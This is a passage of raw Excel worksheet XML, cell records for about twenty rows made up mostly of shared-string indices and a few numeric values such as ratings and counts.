      <c r="E4089" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F4089" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4089" s="12" t="s">
        <v>26263</v>
      </c>
      <c r="H4089" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4089" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4089" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4089" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4089" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4089" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4089" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4089" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4089" s="12" t="s">
        <v>26264</v>
      </c>
      <c r="Q4089" s="12">
        <v>3.8</v>
      </c>
      <c r="R4089" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4089" s="12" t="s">
        <v>26265</v>
      </c>
      <c r="T4089" s="12" t="s">
        <v>26266</v>
      </c>
      <c r="U4089" s="12" t="s">
        <v>26267</v>
      </c>
      <c r="V4089" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4089" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4089" s="12">
        <v>225</v>
      </c>
      <c r="Y4089" s="12" t="s">
        <v>26268</v>
      </c>
    </row>
    <row r="4090" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4090" s="12">
        <v>53071</v>
      </c>
      <c r="B4090" s="12" t="s">
        <v>31139</v>
      </c>
      <c r="D4090" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4090" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4090" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4090" s="12" t="s">
        <v>26269</v>
      </c>
      <c r="H4090" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4090" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4090" s="12" t="s">
        <v>2609</v>
      </c>
      <c r="K4090" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4090" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4090" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4090" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4090" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4090" s="12" t="s">
        <v>26270</v>
      </c>
      <c r="Q4090" s="12">
        <v>3.7</v>
      </c>
      <c r="R4090" s="12" t="e">
        <v>#NAME?</v>
      </c>
      <c r="S4090" s="12" t="s">
        <v>26271</v>
      </c>
      <c r="T4090" s="12" t="s">
        <v>26272</v>
      </c>
      <c r="U4090" s="12" t="s">
        <v>26273</v>
      </c>
      <c r="V4090" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4090" s="12">
        <v>85881</v>
      </c>
      <c r="X4090" s="12">
        <v>75</v>
      </c>
      <c r="Y4090" s="12" t="s">
        <v>26274</v>
      </c>
    </row>
    <row r="4091" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4091" s="12">
        <v>53111</v>
      </c>
      <c r="B4091" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4091" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4091" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4091" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4091" s="12" t="s">
        <v>26275</v>
      </c>
      <c r="H4091" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4091" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4091" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K4091" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4091" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4091" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4091" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4091" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4091" s="12" t="s">
        <v>26270</v>
      </c>
      <c r="Q4091" s="12">
        <v>3.7</v>
      </c>
      <c r="R4091" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4091" s="12" t="s">
        <v>26276</v>
      </c>
      <c r="T4091" s="12" t="s">
        <v>26277</v>
      </c>
      <c r="U4091" s="12" t="s">
        <v>26278</v>
      </c>
      <c r="V4091" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W4091" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4091" s="12">
        <v>12</v>
      </c>
      <c r="Y4091" s="12" t="s">
        <v>26279</v>
      </c>
    </row>
    <row r="4092" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4092" s="12">
        <v>53221</v>
      </c>
      <c r="B4092" s="12" t="s">
        <v>31157</v>
      </c>
      <c r="D4092" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4092" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F4092" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4092" s="12" t="s">
        <v>26280</v>
      </c>
      <c r="H4092" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4092" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4092" s="12" t="s">
        <v>9893</v>
      </c>
      <c r="K4092" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4092" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4092" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4092" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4092" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4092" s="12" t="s">
        <v>26281</v>
      </c>
      <c r="Q4092" s="12">
        <v>3</v>
      </c>
      <c r="R4092" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4092" s="12" t="s">
        <v>26282</v>
      </c>
      <c r="T4092" s="12" t="s">
        <v>26283</v>
      </c>
      <c r="U4092" s="12" t="s">
        <v>26284</v>
      </c>
      <c r="V4092" s="12" t="s">
        <v>9896</v>
      </c>
      <c r="W4092" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4092" s="12">
        <v>9</v>
      </c>
      <c r="Y4092" s="12" t="s">
        <v>26285</v>
      </c>
    </row>
    <row r="4093" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4093" s="12">
        <v>53441</v>
      </c>
      <c r="B4093" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4093" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4093" s="12" t="s">
        <v>31437</v>
      </c>
      <c r="F4093" s="12" t="s">
        <v>30504</v>
      </c>
      <c r="G4093" s="12" t="s">
        <v>26286</v>
      </c>
      <c r="H4093" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4093" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4093" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K4093" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4093" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4093" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4093" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4093" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4093" s="12" t="s">
        <v>26287</v>
      </c>
      <c r="Q4093" s="12">
        <v>3.7</v>
      </c>
      <c r="R4093" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4093" s="12" t="s">
        <v>26288</v>
      </c>
      <c r="T4093" s="12" t="s">
        <v>18898</v>
      </c>
      <c r="U4093" s="12" t="s">
        <v>26289</v>
      </c>
      <c r="V4093" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W4093" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4093" s="12">
        <v>12</v>
      </c>
      <c r="Y4093" s="12" t="s">
        <v>26290</v>
      </c>
    </row>
    <row r="4094" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4094" s="12">
        <v>53561</v>
      </c>
      <c r="B4094" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4094" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4094" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4094" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4094" s="12" t="s">
        <v>26291</v>
      </c>
      <c r="H4094" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4094" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4094" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K4094" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4094" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4094" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4094" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4094" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4094" s="12" t="s">
        <v>26292</v>
      </c>
      <c r="Q4094" s="12">
        <v>3.8</v>
      </c>
      <c r="R4094" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4094" s="12" t="s">
        <v>26293</v>
      </c>
      <c r="T4094" s="12" t="s">
        <v>26294</v>
      </c>
      <c r="U4094" s="12" t="s">
        <v>26295</v>
      </c>
      <c r="V4094" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4094" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4094" s="12">
        <v>13</v>
      </c>
      <c r="Y4094" s="12" t="s">
        <v>26296</v>
      </c>
    </row>
    <row r="4095" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4095" s="12">
        <v>53771</v>
      </c>
      <c r="B4095" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4095" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4095" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4095" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4095" s="12" t="s">
        <v>26302</v>
      </c>
      <c r="H4095" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4095" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4095" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4095" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4095" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4095" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4095" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4095" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4095" s="12" t="s">
        <v>26287</v>
      </c>
      <c r="Q4095" s="12">
        <v>3.7</v>
      </c>
      <c r="R4095" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4095" s="12" t="s">
        <v>26303</v>
      </c>
      <c r="T4095" s="12" t="s">
        <v>26304</v>
      </c>
      <c r="U4095" s="12" t="s">
        <v>26305</v>
      </c>
      <c r="V4095" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4095" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4095" s="12">
        <v>7</v>
      </c>
      <c r="Y4095" s="12" t="s">
        <v>26306</v>
      </c>
    </row>
    <row r="4096" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4096" s="12">
        <v>53811</v>
      </c>
      <c r="B4096" s="12" t="s">
        <v>30187</v>
      </c>
      <c r="D4096" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4096" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4096" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4096" s="12" t="s">
        <v>26307</v>
      </c>
      <c r="H4096" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4096" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4096" s="12" t="s">
        <v>2586</v>
      </c>
      <c r="K4096" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4096" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4096" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4096" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4096" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4096" s="12">
        <v>3.6</v>
      </c>
      <c r="Q4096" s="12">
        <v>3.6</v>
      </c>
      <c r="R4096" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4096" s="12" t="s">
        <v>26308</v>
      </c>
      <c r="T4096" s="12" t="s">
        <v>26309</v>
      </c>
      <c r="U4096" s="12" t="s">
        <v>26310</v>
      </c>
      <c r="V4096" s="12" t="s">
        <v>25488</v>
      </c>
      <c r="W4096" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4096" s="12">
        <v>46</v>
      </c>
      <c r="Y4096" s="12" t="s">
        <v>26311</v>
      </c>
    </row>
    <row r="4097" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4097" s="12">
        <v>54021</v>
      </c>
      <c r="B4097" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4097" s="12" t="s">
        <v>31372</v>
      </c>
      <c r="D4097" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4097" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F4097" s="12" t="s">
        <v>31344</v>
      </c>
      <c r="G4097" s="12" t="s">
        <v>26318</v>
      </c>
      <c r="H4097" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4097" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4097" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K4097" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4097" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4097" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4097" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4097" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4097" s="12" t="s">
        <v>26319</v>
      </c>
      <c r="Q4097" s="12">
        <v>3.7</v>
      </c>
      <c r="R4097" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4097" s="12" t="s">
        <v>26320</v>
      </c>
      <c r="T4097" s="12" t="s">
        <v>26321</v>
      </c>
      <c r="U4097" s="12" t="s">
        <v>26322</v>
      </c>
      <c r="V4097" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W4097" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4097" s="12">
        <v>70</v>
      </c>
      <c r="Y4097" s="12" t="s">
        <v>26323</v>
      </c>
    </row>
    <row r="4098" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4098" s="12">
        <v>54031</v>
      </c>
      <c r="B4098" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4098" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4098" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4098" s="12" t="s">
        <v>26324</v>
      </c>
      <c r="H4098" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4098" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4098" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K4098" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4098" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4098" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4098" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4098" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4098" s="12" t="s">
        <v>26325</v>
      </c>
      <c r="Q4098" s="12">
        <v>3.8</v>
      </c>
      <c r="R4098" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4098" s="12" t="s">
        <v>26326</v>
      </c>
      <c r="T4098" s="12" t="s">
        <v>18930</v>
      </c>
      <c r="U4098" s="12" t="s">
        <v>26327</v>
      </c>
      <c r="V4098" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W4098" s="12">
        <v>54011</v>
      </c>
      <c r="X4098" s="12">
        <v>5</v>
      </c>
      <c r="Y4098" s="12" t="s">
        <v>26328</v>
      </c>
    </row>
    <row r="4099" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4099" s="12">
        <v>54061</v>
      </c>
      <c r="B4099" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4099" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4099" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F4099" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4099" s="12" t="s">
        <v>26329</v>
      </c>
      <c r="H4099" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4099" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J4099" s="12" t="s">
        <v>14197</v>
      </c>
      <c r="K4099" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4099" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4099" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4099" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4099" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="Q4099" s="12" t="s">
        <v>31405</v>
      </c>
      <c r="R4099" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4099" s="12" t="s">
        <v>26330</v>
      </c>
      <c r="T4099" s="12" t="s">
        <v>25485</v>
      </c>
      <c r="U4099" s="12" t="s">
        <v>26331</v>
      </c>
      <c r="V4099" s="12" t="s">
        <v>14432</v>
      </c>
      <c r="W4099" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4099" s="12">
        <v>4</v>
      </c>
      <c r="Y4099" s="12" t="s">
        <v>26332</v>
      </c>
    </row>
    <row r="4100" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4100" s="12">
        <v>54191</v>
      </c>
      <c r="B4100" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D4100" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4100" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4100" s="12" t="s">
        <v>26339</v>
      </c>
      <c r="H4100" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4100" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4100" s="12" t="s">
        <v>162</v>
      </c>
      <c r="K4100" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4100" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4100" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4100" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4100" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4100" s="12" t="s">
        <v>26340</v>
      </c>
      <c r="Q4100" s="12">
        <v>3.5</v>
      </c>
      <c r="R4100" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4100" s="12" t="s">
        <v>26341</v>
      </c>
      <c r="T4100" s="12" t="s">
        <v>26342</v>
      </c>
      <c r="U4100" s="12" t="s">
        <v>26343</v>
      </c>
      <c r="V4100" s="12" t="s">
        <v>3737</v>
      </c>
      <c r="W4100" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4100" s="12">
        <v>6</v>
      </c>
      <c r="Y4100" s="12" t="s">
        <v>26344</v>
      </c>
    </row>
    <row r="4101" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4101" s="12">
        <v>54331</v>
      </c>
      <c r="B4101" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4101" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4101" s="18" t="s">
        <v>31454</v>
      </c>
      <c r="F4101" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4101" s="12" t="s">
        <v>26351</v>
      </c>
      <c r="H4101" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4101" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4101" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4101" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4101" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4101" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4101" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4101" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4101" s="12" t="s">
        <v>26352</v>
      </c>
      <c r="Q4101" s="12">
        <v>3.7</v>
      </c>
      <c r="R4101" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4101" s="12" t="s">
        <v>26353</v>
      </c>
      <c r="T4101" s="12" t="s">
        <v>26354</v>
      </c>
      <c r="U4101" s="12" t="s">
        <v>26355</v>
      </c>
      <c r="V4101" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4101" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4101" s="12">
        <v>42</v>
      </c>
      <c r="Y4101" s="12" t="s">
        <v>26356</v>
      </c>
    </row>
    <row r="4102" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4102" s="12">
        <v>54411</v>
      </c>
      <c r="B4102" s="12" t="s">
        <v>31158</v>
      </c>
      <c r="C4102" s="12" t="s">
        <v>31159</v>
      </c>
      <c r="D4102" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4102" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F4102" s="12" t="s">
        <v>31160</v>
      </c>
      <c r="G4102" s="12" t="s">
        <v>26357</v>
      </c>
      <c r="H4102" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4102" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4102" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K4102" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4102" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4102" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4102" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4102" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4102" s="12" t="s">
        <v>26358</v>
      </c>
      <c r="Q4102" s="12">
        <v>3.8</v>
      </c>
      <c r="R4102" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4102" s="12" t="s">
        <v>26359</v>
      </c>
      <c r="T4102" s="12" t="s">
        <v>26360</v>
      </c>
      <c r="U4102" s="12" t="s">
        <v>26361</v>
      </c>
      <c r="V4102" s="12" t="s">
        <v>15191</v>
      </c>
      <c r="W4102" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4102" s="12">
        <v>9</v>
      </c>
      <c r="Y4102" s="12" t="s">
        <v>26362</v>
      </c>
    </row>
    <row r="4103" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4103" s="12">
        <v>54911</v>
      </c>
      <c r="B4103" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4103" s="12" t="s">
        <v>30353</v>
      </c>
      <c r="D4103" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4103" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F4103" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4103" s="12" t="s">
        <v>26372</v>
      </c>
      <c r="H4103" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4103" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4103" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4103" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4103" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4103" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4103" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4103" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4103" s="12" t="s">
        <v>26373</v>
      </c>
      <c r="Q4103" s="12">
        <v>3.7</v>
      </c>
      <c r="R4103" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4103" s="12" t="s">
        <v>26374</v>
      </c>
      <c r="T4103" s="12" t="s">
        <v>26375</v>
      </c>
      <c r="U4103" s="12" t="s">
        <v>26376</v>
      </c>
      <c r="V4103" s="12" t="s">
        <v>8798</v>
      </c>
      <c r="W4103" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4103" s="12">
        <v>46</v>
      </c>
      <c r="Y4103" s="12" t="s">
        <v>26377</v>
      </c>
    </row>
    <row r="4104" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4104" s="12">
        <v>55001</v>
      </c>
      <c r="B4104" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4104" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4104" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4104" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4104" s="12" t="s">
        <v>26378</v>
      </c>
      <c r="H4104" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4104" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4104" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K4104" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4104" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4104" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4104" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4104" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4104" s="12" t="s">
        <v>26379</v>
      </c>
      <c r="Q4104" s="12" t="s">
        <v>28322</v>
      </c>
      <c r="R4104" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4104" s="12" t="s">
        <v>26380</v>
      </c>
      <c r="T4104" s="12" t="s">
        <v>26381</v>
      </c>
      <c r="U4104" s="12" t="s">
        <v>26382</v>
      </c>
      <c r="V4104" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4104" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4104" s="12">
        <v>6</v>
      </c>
      <c r="Y4104" s="12" t="s">
        <v>26383</v>
      </c>
    </row>
    <row r="4105" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4105" s="12">
        <v>55201</v>
      </c>
      <c r="B4105" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4105" s="12" t="s">
        <v>31303</v>
      </c>
      <c r="D4105" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4105" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F4105" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4105" s="12" t="s">
        <v>26384</v>
      </c>
      <c r="H4105" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4105" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J4105" s="12" t="s">
        <v>14197</v>
      </c>
      <c r="K4105" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4105" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4105" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4105" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4105" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4105" s="12" t="s">
        <v>26197</v>
      </c>
      <c r="Q4105" s="12">
        <v>3.7</v>
      </c>
      <c r="R4105" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4105" s="12" t="s">
        <v>26385</v>
      </c>
      <c r="T4105" s="12" t="s">
        <v>25485</v>
      </c>
      <c r="U4105" s="12" t="s">
        <v>26386</v>
      </c>
      <c r="V4105" s="12" t="s">
        <v>14432</v>
      </c>
      <c r="W4105" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4105" s="12">
        <v>8</v>
      </c>
      <c r="Y4105" s="12" t="s">
        <v>26387</v>
      </c>
    </row>
    <row r="4106" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4106" s="12">
        <v>55321</v>
      </c>
      <c r="B4106" s="12" t="s">
        <v>30421</v>
      </c>
      <c r="C4106" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D4106" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4106" s="12" t="s">
        <v>31445</v>
      </c>
      <c r="F4106" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4106" s="12" t="s">
        <v>26388</v>
      </c>
      <c r="H4106" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4106" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4106" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K4106" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4106" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4106" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4106" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4106" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4106" s="12" t="s">
        <v>26389</v>
      </c>
      <c r="Q4106" s="12">
        <v>3.9</v>
      </c>
      <c r="R4106" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4106" s="12" t="s">
        <v>26390</v>
      </c>
      <c r="T4106" s="12" t="s">
        <v>16353</v>
      </c>
      <c r="U4106" s="12" t="s">
        <v>26391</v>
      </c>
      <c r="V4106" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W4106" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4106" s="12">
        <v>7</v>
      </c>
      <c r="Y4106" s="12" t="s">
        <v>26392</v>
      </c>
    </row>
    <row r="4107" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4107" s="12">
        <v>55411</v>
      </c>
      <c r="B4107" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4107" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4107" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4107" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4107" s="12" t="s">
